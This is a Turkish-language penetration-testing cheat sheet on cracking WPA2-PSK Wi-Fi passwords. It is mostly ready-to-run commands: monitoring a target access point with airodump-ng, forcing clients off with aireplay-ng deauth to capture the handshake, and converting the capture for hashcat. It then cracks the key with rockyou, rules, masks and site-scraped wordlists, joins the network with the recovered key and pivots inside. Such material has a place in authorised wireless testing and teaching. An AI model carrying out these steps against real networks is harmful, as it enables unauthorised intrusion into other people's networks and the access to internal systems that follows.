Skip to content

WPA2-PSK Handshake Kırma

WPA2 difficulty: orta

WPA2-PSK’da parola ağ üzerinden gitmez; istemci bağlanırken oluşan 4-way handshake (EAPOL) yakalanırsa parola offline sözlük/kural/mask saldırısıyla denenır. Kırılabilirlik tamamen PSK gücüne ve wordlist kalitesine bağlıdır. WPA3-SAE bu klasik yönteme dirençlidir.

- Monitor mode + injection
- Hedef: WPA/WPA2 PSK (AUTH PSK, CIPHER CCMP/TKIP)
- En az bir istemci (veya doğal reconnect bekle)
- rockyou / kurumsal wordlist + hashcat (GPU önerilir)
  1. Hedef AP’yi dinle — kanal ve BSSID’e kilitlen:

    Terminal window
    sudo iw dev wlan0mon set channel 6
    Terminal window
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa wlan0mon
  2. İstemciyi düşür (deauth) — yeniden bağlanınca mesaj 1–4 yakalanır:

    Terminal window
    sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
  3. Yakalamayı doğrula — airodump sağ üstte WPA handshake: AA:BB:… . Alternatif:

    Terminal window
    aircrack-ng wpa-01.cap
    Terminal window
    hcxpcapngtool -o test.22000 wpa-01.cap
    Terminal window
    cowpatty -r wpa-01.cap -c

Doğal handshake (deauth yok): istemci kendiliğinden bağlanana kadar dinle — daha az gürültülü, daha yavaş.

Terminal window
sudo hcxdumptool -i wlan0mon -w dump.pcapng \
--enable_status=15 --filterlist_ap=bssid.txt --filtermode=2
Terminal window
aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF wpa-01.cap
Terminal window
aircrack-ng -w rockyou.txt -e "CorpWifi" wpa-01.cap
Terminal window
hcxpcapngtool -o hash.22000 wpa-01.cap
Terminal window
hashcat -m 22000 hash.22000 rockyou.txt
Terminal window
hashcat -m 22000 hash.22000 rockyou.txt -r /usr/share/hashcat/rules/best64.rule
Terminal window
hashcat -m 22000 hash.22000 -a 3 'Sirket?d?d?d?d!'

Eski formatlar:

Terminal window
cap2hccapx wpa-01.cap wpa.hccapx
Terminal window
cewl https://www.target.com -m 6 -w cewl.txt
Terminal window
crunch 8 8 -t Corp%%%% -o mask.txt
Terminal window
hashcat -m 22000 hash.22000 cewl.txt -r rules/best64.rule -O
Terminal window
hashcat -m 22000 hash.22000 --show

Kurumsal SSID’ler sıkça Sirket2024!, WifiSirket, mevsim+yıl kalıpları kullanır.

Mesaj 1+2 yeterli olabilir (hashcat); aircrack genelde 1–4 ister
Nonce tekrar / incomplete → hcxpcapngtool uyarı; yeniden yakala
Birden fazla handshake → tool en iyisini seçer
MIC hatalı / yanlış ESSID → crack imkânsız; yeniden capture
Terminal window
hcxpcapngtool -o hash.22000 wpa-01.cap -E essid.list -I info.txt
Terminal window
cat info.txt
Terminal window
sudo nmcli dev wifi connect "CorpWifi" password 'FoundPSK'
Terminal window
network={
Terminal window
ssid="CorpWifi"
Terminal window
psk="FoundPSK"
Terminal window
}
Terminal window
sudo wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B
Terminal window
sudo dhclient wlan0

Sonrasında iç ağ: scanning, DHCP ile yeni segment.

WPA1-PSK (TKIP) → aynı 4-way; hashcat 22000 yine geçerli
Karışık WPA/WPA2 → yine EAPOL yakala
Geçiş modu AP → istemci CCMP tercih ederse CCMP handshake gelir

airodump · capture

embedded tool
Generated command
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa wlan0mon
recon → airodump kilit
→ deauth client
→ hcxpcapngtool → hash.22000
→ hashcat + cewl + rules
→ PSK → iç ağ pivot
İstemci yok / PMF → PMKID dene
→ hcxdumptool → aynı 22000